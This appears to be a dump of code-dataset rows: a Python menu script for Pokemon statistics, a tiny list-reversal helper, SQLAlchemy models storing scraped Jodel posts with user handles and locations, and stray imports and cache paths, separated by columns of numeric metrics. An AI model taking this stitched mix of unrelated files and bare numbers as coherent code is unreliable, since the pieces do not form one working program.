        both Height(m) and Weight(kg)); "19" selects all Pokemon trimmed
        on both; "20" trims heights only; "21" trims weights only.  Any
        other value is silently ignored.

    Returns
    -------
    None
    """
    # Default tag; options "20"/"21" override it below.
    modified_data_tag = '(trimmed Height(m) & Weight(kg))'
    # Menu option -> (display name, loaddata attribute key).  Per-type data
    # sets follow a strict naming convention ('trimmed_<key>_types' /
    # 'z_trimmed_<key>' / '<key>_trim_data'), so a lookup table replaces
    # the former 18-branch if/elif chain; the whole-population options
    # ("19"-"21") use irregular attribute names and keep explicit branches.
    type_table = {
        "1": ("Grass Type", "grass"),
        "2": ("Fire Type", "fire"),
        "3": ("Water Type", "water"),
        "4": ("Electric Type", "electric"),
        "5": ("Psychic Type", "psychic"),
        "6": ("Ice Type", "ice"),
        "7": ("Dragon Type", "dragon"),
        "8": ("Dark Type", "dark"),
        "9": ("Fairy Type", "fairy"),
        "10": ("Normal Type", "normal"),
        "11": ("Fighting Type", "fighting"),
        "12": ("Flying Type", "flying"),
        "13": ("Poison Type", "poison"),
        "14": ("Ground Type", "ground"),
        "15": ("Rock Type", "rock"),
        "16": ("Bug Type", "bug"),
        "17": ("Ghost Type", "ghost"),
        "18": ("Steel Type", "steel"),
    }
    if option in type_table:
        set_name, key = type_table[option]
        set_data = getattr(loaddata, 'trimmed_{}_types'.format(key))
        z_set_data = getattr(loaddata, 'z_trimmed_{}'.format(key))
        trim_data = getattr(loaddata, '{}_trim_data'.format(key))
    elif option == "19":  # all pokemon, trimmed heights & weights
        set_name = "Pokemon"
        set_data = loaddata.pkm_trim_hw
        z_set_data = loaddata.z_trimmed_pokemon
        trim_data = loaddata.trim_data
    elif option == "20":  # all pokemon, trimmed heights only
        set_name = "Pokemon"
        set_data = loaddata.pokemon_trimmed_heights
        z_set_data = loaddata.z_pokemon_t_h
        trim_data = loaddata.trim_data_h
        modified_data_tag = '(trimmed Height(m))'
    elif option == "21":  # all pokemon, trimmed weights only
        set_name = "Pokemon"
        set_data = loaddata.pokemon_trimmed_weights
        z_set_data = loaddata.z_pokemon_t_w
        trim_data = loaddata.trim_data_w
        modified_data_tag = '(trimmed Weight(kg))'
    else:
        return
    pokemon_regression.pokemon_regression_analysis(set_name, set_data, z_set_data, trim_data, modified_data_tag)
    return
def do_regression_analysis_full(option):
    """Run a regression analysis over the full (untrimmed) data set chosen by *option*.

    *option* is the menu selection string ("1"-"19"); any other value is a no-op.
    """
    modified_data_tag = ''
    # menu option -> (display name, loaddata data attribute, loaddata z-score attribute)
    data_sets = {
        "1": ("Grass Type", "grass_types", "z_grass"),
        "2": ("Fire Type", "fire_types", "z_fire"),
        "3": ("Water Type", "water_types", "z_water"),
        "4": ("Electric Type", "electric_types", "z_electric"),
        "5": ("Psychic Type", "psychic_types", "z_psychic"),
        "6": ("Ice Type", "ice_types", "z_ice"),
        "7": ("Dragon Type", "dragon_types", "z_dragon"),
        "8": ("Dark Type", "dark_types", "z_dark"),
        "9": ("Fairy Type", "fairy_types", "z_fairy"),
        "10": ("Normal Type", "normal_types", "z_normal"),
        "11": ("Fighting Type", "fighting_types", "z_fighting"),
        "12": ("Flying Type", "flying_types", "z_flying"),
        "13": ("Poison Type", "poison_types", "z_poison"),
        "14": ("Ground Type", "ground_types", "z_ground"),
        "15": ("Rock Type", "rock_types", "z_rock"),
        "16": ("Bug Type", "bug_types", "z_bug"),
        "17": ("Ghost Type", "ghost_types", "z_ghost"),
        "18": ("Steel Type", "steel_types", "z_steel"),
        "19": ("Pokemon", "all_pokemon", "z_pokemon"),
    }
    chosen = data_sets.get(option)
    if chosen is None:
        # unrecognised option: silently do nothing, like the menu expects
        return
    set_name, data_attr, z_attr = chosen
    pokemon_regression.pokemon_regression_analysis(
        set_name, getattr(loaddata, data_attr), getattr(loaddata, z_attr), modified_data_tag)
    return
def do_stat_analysis_non_legendary(option):
    """Run a stat analysis restricted to non-legendary pokemon.

    *option* is the menu selection string ("1"-"9"); any other value is a no-op.
    """
    # menu option -> (display name, loaddata attribute suffix)
    stat_menu = {
        "1": ("Stat Totals", "total_points"),
        "2": ("HP", "hp"),
        "3": ("Speed", "speed"),
        "4": ("Attack", "attack"),
        "5": ("Defense", "defense"),
        "6": ("Special Attack", "sp_attack"),
        "7": ("Special Defense", "sp_defense"),
        "8": ("Height(m)", "height"),
        "9": ("Weight(kg)", "weight"),
    }
    chosen = stat_menu.get(option)
    if chosen is None:
        return
    stat_name, key = chosen
    # loaddata exposes a regular naming scheme for this data set:
    # non_legendary_<key>, z_non_legendary_<key>, plus their *_stats partners.
    pokemon_stat_analysis.stat_analysis(
        stat_name,
        getattr(loaddata, f"non_legendary_{key}"),
        getattr(loaddata, f"z_non_legendary_{key}"),
        getattr(loaddata, f"non_legendary_{key}_stats"),
        getattr(loaddata, f"z_non_legendary_{key}_stats"),
        modifier='(non_legendary)')
    return
def do_stat_analysis_legendary(option):
    """Run a stat analysis restricted to legendary pokemon.

    *option* is the menu selection string ("1"-"9"); any other value is a no-op.
    """
    # menu option -> (display name, loaddata attribute suffix)
    stat_menu = {
        "1": ("Stat Totals", "total_points"),
        "2": ("HP", "hp"),
        "3": ("Speed", "speed"),
        "4": ("Attack", "attack"),
        "5": ("Defense", "defense"),
        "6": ("Special Attack", "sp_attack"),
        "7": ("Special Defense", "sp_defense"),
        "8": ("Height(m)", "height"),
        "9": ("Weight(kg)", "weight"),
    }
    chosen = stat_menu.get(option)
    if chosen is None:
        return
    stat_name, key = chosen
    # loaddata exposes a regular naming scheme for this data set:
    # legendary_<key>, z_legendary_<key>, plus their *_stats partners.
    pokemon_stat_analysis.stat_analysis(
        stat_name,
        getattr(loaddata, f"legendary_{key}"),
        getattr(loaddata, f"z_legendary_{key}"),
        getattr(loaddata, f"legendary_{key}_stats"),
        getattr(loaddata, f"z_legendary_{key}_stats"),
        modifier='(legendary)')
    return
def do_stat_analysis_trimmed(option):
    """Run a stat analysis over the outlier-trimmed data set.

    *option* is the menu selection string ("1"-"9"); any other value is a no-op.
    """
    # menu option -> (display name, loaddata attribute suffix)
    stat_menu = {
        "1": ("Stat Totals", "total_points"),
        "2": ("HP", "hp"),
        "3": ("Speed", "speed"),
        "4": ("Attack", "attack"),
        "5": ("Defense", "defense"),
        "6": ("Special Attack", "sp_attack"),
        "7": ("Special Defense", "sp_defense"),
        "8": ("Height(m)", "height"),
        "9": ("Weight(kg)", "weight"),
    }
    chosen = stat_menu.get(option)
    if chosen is None:
        return
    stat_name, key = chosen
    # loaddata exposes a regular naming scheme for this data set:
    # trimmed_<key>, z_trimmed_<key>, plus their *_stats partners.
    pokemon_stat_analysis.stat_analysis(
        stat_name,
        getattr(loaddata, f"trimmed_{key}"),
        getattr(loaddata, f"z_trimmed_{key}"),
        getattr(loaddata, f"trimmed_{key}_stats"),
        getattr(loaddata, f"z_trimmed_{key}_stats"),
        modifier='(trimmed)')
    return
def do_stat_analysis_full(option):
    """Run a stat analysis over the full (untrimmed) data set.

    *option* is the menu selection string ("1"-"9"); any other value is a no-op.
    """
    # menu option -> (display name, raw-values attribute, attribute stem for the
    # derived z_<stem>, <stem>_stats and z_<stem>_stats attributes)
    stat_menu = {
        "1": ("Stat Totals", "total_points", "total_points"),
        "2": ("HP", "hp", "hp"),
        "3": ("Speed", "speed", "speed"),
        "4": ("Attack", "attack", "attack"),
        "5": ("Defense", "defense", "defense"),
        "6": ("Special Attack", "sp_attack", "sp_attack"),
        "7": ("Special Defense", "sp_defense", "sp_defense"),
        # NOTE: the raw values live under ``heights`` (plural) while the
        # derived attributes use the singular ``height`` stem.
        "8": ("Height(m)", "heights", "height"),
        "9": ("Weight(kg)", "weight", "weight"),
    }
    chosen = stat_menu.get(option)
    if chosen is None:
        return
    stat_name, values_attr, stem = chosen
    pokemon_stat_analysis.stat_analysis(
        stat_name,
        getattr(loaddata, values_attr),
        getattr(loaddata, f"z_{stem}"),
        getattr(loaddata, f"{stem}_stats"),
        getattr(loaddata, f"z_{stem}_stats"))
    return
def print_options_sets():
    """Print the data-set selection menu (full / trimmed / non-legendary / legendary)."""
    ret_str = (
        f"\n{tab * 6}- - - Select Your Specific Pokemon Data Set - - -\n"
        f"\n{tab * 4}1: Full Data\n"
        # BUG FIX: the original literal had a stray leading space here, which
        # pushed "2: Trimmed Data" one column out of line with the other options.
        f"{tab * 4}2: Trimmed Data\n"
        f"{tab * 4}3: Non Legendary Pokemon\n"
        f"{tab * 4}4: Legendary Pokemon\n"
        f"{tab * 5}0: EXIT\n"
    )
    print(ret_str)
def print_options_types(modifier=''):
    """Print the pokemon-type selection menu.

    *modifier* customises the title (e.g. "Trimmed") and, when it equals
    "Trimmed", swaps the wording of option 19.
    """
    if modifier:
        parts = [f"\n{tab * 6}- - - Select {modifier} Type - - -\n"]
    else:
        parts = [f"\n{tab * 6}- - - Select Type - - -\n"]
    parts.append(
        f"\n{tab * 4}1: Grass Types {tab * 3}2: Fire Types\n"
        f"{tab * 4}3: Water Types {tab * 3}4: Electric Types\n"
        f"{tab * 4}5: Psychic Types {tab * 2}6: Ice Types\n"
        f"{tab * 4}7: Dragon Types {tab * 2}8: Dark Types\n"
        f"{tab * 4}9: Fairy Types {tab * 3}10: Normal Types\n"
        f"{tab * 4}11: Fighting Types {tab * 2}12: Flying Types\n"
        f"{tab * 4}13: Poison Types {tab * 2}14: Ground Types\n"
        f"{tab * 4}15: Rock Types {tab * 3}16: Bug Types\n"
        f"{tab * 4}17: Ghost Types {tab * 2}18: Steel Types\n"
    )
    if modifier == "Trimmed":
        parts.append(f"{tab * 4}19: All Pokemon (trimmed Height(m) & Weight(kg))\n")
    else:
        parts.append(f"{tab * 4}19: Entire Set\n")
    parts.append(f"{tab * 5}0: EXIT\n")
    print("".join(parts))
def print_options_stats(modifier=''):
    """Print the stat selection menu; *modifier* customises the title."""
    if modifier:
        header = f"\n{tab * 6}- - - Select {modifier} Stat - - -\n"
    else:
        header = f"\n{tab * 6}- - - Select Stat - - -\n"
    body = (
        f"\n{tab * 6}1: Stat Totals\n"
        f"{tab * 4}2: HP{tab * 5}3: Speed\n"
        f"{tab * 4}4: Attack{tab * 4}5: Defense\n"
        f"{tab * 4}6: Special Attack{tab * 2}7: Special Defense\n"
        f"{tab * 4}8: Height(m){tab * 3}9: Weight(kg)\n"
        f"{tab * 5}0: EXIT\n"
    )
    print(header + body)
def print_options_home():
    """Print the top-level menu of analyses offered by this script."""
    menu = (
        f"\n{tab * 6} - - - OPTIONS - - - \n"
        f"\n{tab * 4}1: Stat Analysis\n"
        f"{tab * 4}2: Pokemon Regression Analysis\n"
        f"{tab * 4}3: Testing Normal Distribution against Actual Values\n"
        f"{tab * 4}4: Are Pokemon Heights Normal or Log distributed?\n"
        f"{tab * 4}5: Random Pokemon Correlations\n"
        f"{tab * 4}6: Are Dragon Types Taller Than Non Dragon Types?\n"
        f"{tab * 5}0: Exit\n"
    )
    print(menu)
if __name__ == "__main__":
    # Interactive menu loop.  NOTE: choosing "0" inside a sub-menu breaks out
    # of the outer ``while`` and therefore exits the whole program, matching
    # the "0: EXIT" label shown on every menu.
    while 1:
        print_options_home()
        val_home = input(f"\n{tab * 2}Enter Desired Option: ")
        if val_home == "1":
            # --- Stat analysis: choose a data set, then a stat. ---
            print_options_sets()
            val_opt_set = input(f"\n{tab * 2}Enter Option: ")
            if val_opt_set == "1":
                # full data set
                print_options_stats()
                val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
                if val_opt_stat == "0":
                    break
                else:
                    do_stat_analysis_full(val_opt_stat)
            elif val_opt_set == "2":
                # trimmed data set
                print_options_stats("Trimmed")
                val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
                if val_opt_stat == "0":
                    break
                else:
                    # BUG FIX: this branch previously called
                    # do_stat_analysis_full(), so the "Trimmed Data" menu path
                    # silently analysed the untrimmed data.
                    do_stat_analysis_trimmed(val_opt_stat)
            elif val_opt_set == "3":
                # non-legendary pokemon only
                print_options_stats("Non Legendary Pokemon")
                val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
                if val_opt_stat == "0":
                    break
                else:
                    do_stat_analysis_non_legendary(val_opt_stat)
            elif val_opt_set == "4":
                # legendary pokemon only
                print_options_stats("Legendary Pokemon")
                val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
                if val_opt_stat == "0":
                    break
                else:
                    do_stat_analysis_legendary(val_opt_stat)
            else:
                break
            continue
        elif val_home == "2":
            # --- Regression analysis: choose a data set, then a type. ---
            print_options_sets()
            val_opt_set = input(f"\n{tab * 2}Enter Option: ")
            if val_opt_set == "1":
                print_options_types()
                val_opt_type = input(f"\n{tab * 2}Enter Option: ")
                if val_opt_type == "0":
                    break
                else:
                    do_regression_analysis_full(val_opt_type)
            elif val_opt_set == "2":
                print_options_types("Trimmed")
                val_opt_type = input(f"\n{tab * 2}Enter Option: ")
                if val_opt_type == "0":
                    break
                else:
                    do_regression_analysis_trimmed(val_opt_type)
            elif val_opt_set == "3":
                print_options_types("Non Legendary Pokemon")
                val_opt_type = input(f"\n{tab * 2}Enter Option: ")
                if val_opt_type == "0":
                    break
                else:
                    do_regression_analysis_non_legendary(val_opt_type)
            elif val_opt_set == "4":
                print_options_types("Legendary Pokemon")
                val_opt_type = input(f"\n{tab * 2}Enter Option: ")
                if val_opt_type == "0":
                    break
                else:
                    do_regression_analysis_legendary(val_opt_type)
            else:
                break
            continue
        elif val_home == "3":
            # --- Normal distribution vs. actual values: set, type, then stat. ---
            print_options_sets()
            val_opt_set = input(f"\n{tab * 2}Enter Option: ")
            if val_opt_set == "0":
                break
            else:
                print_options_types()
                val_opt_type = input(f"\n{tab * 2}Enter Option: ")
                if val_opt_type == "0":
                    break
                else:
                    print_options_stats()
                    val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
                    if val_opt_stat == "0":
                        break
                    else:
                        do_normal_dist_against_actual_values([val_opt_set, val_opt_type, val_opt_stat])
            continue
        elif val_home == "4":
            # placeholder: this analysis is not wired up yet, only announced
            print(f"{tab * 4} Are Pokemon Heights Normal or Log distributed?")
            continue
        elif val_home == "5":
            # placeholder: this analysis is not wired up yet, only announced
            print(f"{tab * 4} Random Pokemon Correlations")
            continue
        elif val_home == "6":
            pokemon_test_are_dragons_taller.are_dragons_taller()
        else:
            print("Exit")
            break
| 46.485816
| 119
| 0.522862
| 25,559
| 247,444
| 4.722446
| 0.005595
| 0.06338
| 0.112741
| 0.066114
| 0.979089
| 0.968774
| 0.930349
| 0.82716
| 0.744857
| 0.734899
| 0
| 0.02854
| 0.376097
| 247,444
| 5,322
| 120
| 46.494551
| 0.753299
| 0.028629
| 0
| 0.66104
| 0
| 0.000582
| 0.087256
| 0.000263
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002522
| false
| 0
| 0.00097
| 0
| 0.022507
| 0.004851
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
adc792d90ba984c9f4c5ea496185f439bcd852fb
| 65
|
py
|
Python
|
python/tools/lists/reverse.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | 1
|
2021-08-19T13:40:26.000Z
|
2021-08-19T13:40:26.000Z
|
python/tools/lists/reverse.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | null | null | null |
python/tools/lists/reverse.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | 1
|
2021-03-31T12:37:14.000Z
|
2021-03-31T12:37:14.000Z
|
def reverse_array(input_array):
    """Return a reverse iterator over the elements of *input_array*.

    Note: the result is a one-shot iterator, not a list; wrap it in
    ``list(...)`` if a sequence is needed.
    """
    reversed_view = reversed(input_array)
    return reversed_view
| 32.5
| 32
| 0.8
| 9
| 65
| 5.444444
| 0.666667
| 0.408163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 65
| 2
| 33
| 32.5
| 0.859649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
addb7cd6a88702b09abdd64816c43edf063feb4d
| 22
|
py
|
Python
|
RegressionVisualization/ShapeRegressionUtilities/__init__.py
|
jcfr/ShapeRegressionExtension
|
d8b11aeb089bfe36d36a77e217fc75eb3f08e00a
|
[
"Apache-2.0"
] | null | null | null |
RegressionVisualization/ShapeRegressionUtilities/__init__.py
|
jcfr/ShapeRegressionExtension
|
d8b11aeb089bfe36d36a77e217fc75eb3f08e00a
|
[
"Apache-2.0"
] | null | null | null |
RegressionVisualization/ShapeRegressionUtilities/__init__.py
|
jcfr/ShapeRegressionExtension
|
d8b11aeb089bfe36d36a77e217fc75eb3f08e00a
|
[
"Apache-2.0"
] | null | null | null |
from utility import *
| 11
| 21
| 0.772727
| 3
| 22
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
adeae18dc2493ba651b86f09a8bcbd6f101fefe7
| 3,086
|
py
|
Python
|
jodel_scraper_db.py
|
IngoKl/JodelScraper
|
750147927b0c86fe22dfab8af239df13e850593e
|
[
"MIT"
] | null | null | null |
jodel_scraper_db.py
|
IngoKl/JodelScraper
|
750147927b0c86fe22dfab8af239df13e850593e
|
[
"MIT"
] | null | null | null |
jodel_scraper_db.py
|
IngoKl/JodelScraper
|
750147927b0c86fe22dfab8af239df13e850593e
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from sqlalchemy import create_engine, Column, ForeignKey, Integer, String, Boolean, Float, BigInteger
from sqlalchemy.ext.declarative import declarative_base
# Shared declarative base: the ORM models below register their tables on its metadata.
Base = declarative_base()
class Jodel(Base):
    """ORM model for a scraped top-level Jodel post (table ``jodels``)."""
    __tablename__ = 'jodels'
    # Surrogate primary key assigned by the database.
    id = Column(Integer, primary_key=True)
    # When the row was inserted — presumably a unix timestamp; verify against the writer.
    added_to_db = Column(BigInteger)
    channel = Column(String)
    # Reply metadata as delivered by the API.
    child_count = Column(Integer)
    children = Column(String)
    color = Column(String)
    created_at = Column(String)
    discovered_by = Column(Integer)
    distance = Column(Integer)
    from_home = Column(Boolean)
    got_thanks = Column(Boolean)
    image_approved = Column(Boolean)
    image_url = Column(String)
    # Location fields reported with the post.
    location_accuracy = Column(Integer)
    location_city = Column(String)
    location_country = Column(String)
    location_lat = Column(Float)
    location_lng = Column(Float)
    location_name = Column(String)
    # The post's text content.
    message = Column(String)
    notifications_enabled = Column(Boolean)
    oj_replied = Column(Boolean)
    pin_count = Column(Integer)
    # Upstream Jodel post identifier (distinct from the surrogate ``id``).
    post_id = Column(String)
    post_own = Column(String)
    replier = Column(Integer)
    share_count = Column(Integer)
    thumbnail_url = Column(String)
    updated_at = Column(String)
    user_handle = Column(String)
    view_count = Column(Integer)
    vote_count = Column(Integer)
    def __repr__(self):
        # Identify rows by the upstream post id rather than the DB surrogate key.
        return self.post_id
class Reply(Base):
    """ORM model for a reply to a Jodel post (table ``replies``)."""
    __tablename__ = 'replies'
    # Surrogate primary key assigned by the database.
    id = Column(Integer, primary_key=True)
    # When the row was inserted — presumably a unix timestamp; verify against the writer.
    added_to_db = Column(BigInteger)
    channel = Column(String)
    child_count = Column(Integer)
    children = Column(String)
    color = Column(String)
    created_at = Column(String)
    discovered_by = Column(Integer)
    distance = Column(Integer)
    from_home = Column(Boolean)
    got_thanks = Column(Boolean)
    image_approved = Column(Boolean)
    image_url = Column(String)
    # Foreign key to the parent row in the ``jodels`` table.
    jodel_db_id = Column(Integer, ForeignKey('jodels.id'))
    # Location fields reported with the reply.
    location_accuracy = Column(Integer)
    location_city = Column(String)
    location_country = Column(String)
    location_lat = Column(Float)
    location_lng = Column(Float)
    location_name = Column(String)
    # The reply's text content.
    message = Column(String)
    notifications_enabled = Column(Boolean)
    oj_replied = Column(Boolean)
    # Upstream identifier of the parent post as reported by the API.
    parent_id = Column(String)
    pin_count = Column(Integer)
    # Upstream Jodel post identifier of this reply.
    post_id = Column(String)
    post_own = Column(String)
    replier = Column(Integer)
    reply_timestamp = Column(Integer)
    thumbnail_url = Column(String)
    updated_at = Column(String)
    user_handle = Column(String)
    vote_count = Column(Integer)
    def __repr__(self):
        # Identify rows by the upstream post id rather than the DB surrogate key.
        return self.post_id
def get_engine():
    """Return a SQLAlchemy engine for ``jodel_scraper.db``.

    If the database file does not exist yet, the schema for all models
    registered on ``Base`` is created first.  The existence check is done
    before the engine is constructed, exactly as in the original flow.
    """
    # DRY fix: the original duplicated the identical create_engine() call in
    # both branches of the if/else; check first, build the engine once.
    schema_missing = not Path('jodel_scraper.db').is_file()
    engine = create_engine('sqlite:///jodel_scraper.db', echo=False)
    if schema_missing:
        Base.metadata.create_all(engine)
    return engine
| 31.171717
| 102
| 0.6779
| 356
| 3,086
| 5.63764
| 0.266854
| 0.173393
| 0.071749
| 0.021923
| 0.762332
| 0.762332
| 0.762332
| 0.762332
| 0.762332
| 0.715496
| 0
| 0
| 0.229747
| 3,086
| 98
| 103
| 31.489796
| 0.844342
| 0.021711
| 0
| 0.785714
| 0
| 0
| 0.030875
| 0.017839
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.035714
| 0.02381
| 0.928571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bc28e649c1e2d15f16d0fb26a0ede1aee9233850
| 34
|
py
|
Python
|
dexy/reporters/run/__init__.py
|
dsoto/dexy
|
0f2090250040c3c54c8481a16de8e476b559e87c
|
[
"MIT"
] | 136
|
2015-01-06T15:04:47.000Z
|
2021-12-21T22:52:41.000Z
|
dexy/reporters/run/__init__.py
|
dsoto/dexy
|
0f2090250040c3c54c8481a16de8e476b559e87c
|
[
"MIT"
] | 13
|
2015-01-26T14:06:58.000Z
|
2020-03-27T21:16:10.000Z
|
dexy/reporters/run/__init__.py
|
dsoto/dexy
|
0f2090250040c3c54c8481a16de8e476b559e87c
|
[
"MIT"
] | 34
|
2015-01-02T16:24:53.000Z
|
2021-11-27T05:38:30.000Z
|
import dexy.reporters.run.classes
| 17
| 33
| 0.852941
| 5
| 34
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 34
| 1
| 34
| 34
| 0.90625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bc2b5cedc3c88cec596c104e4f23bf287b202395
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/poetry/core/_vendor/lark/exceptions.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/poetry/core/_vendor/lark/exceptions.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/poetry/core/_vendor/lark/exceptions.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/05/02/9c/d0b1159f66633b77046183ef1d174097290c9d42390acbb13d88890d80
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0
| 96
| 1
| 96
| 96
| 0.395833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.